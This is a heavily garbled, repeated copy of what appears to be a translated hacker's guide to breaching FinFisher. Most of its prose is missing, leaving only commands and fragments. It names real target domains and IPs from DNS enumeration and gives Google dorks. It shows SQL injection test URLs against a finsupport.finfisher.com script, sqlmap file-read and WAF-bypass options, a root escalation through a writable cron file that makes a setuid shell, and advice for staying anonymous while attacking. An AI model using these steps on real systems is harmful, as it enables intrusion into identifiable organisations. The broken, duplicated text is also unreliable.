The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
4. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
5. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
6. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



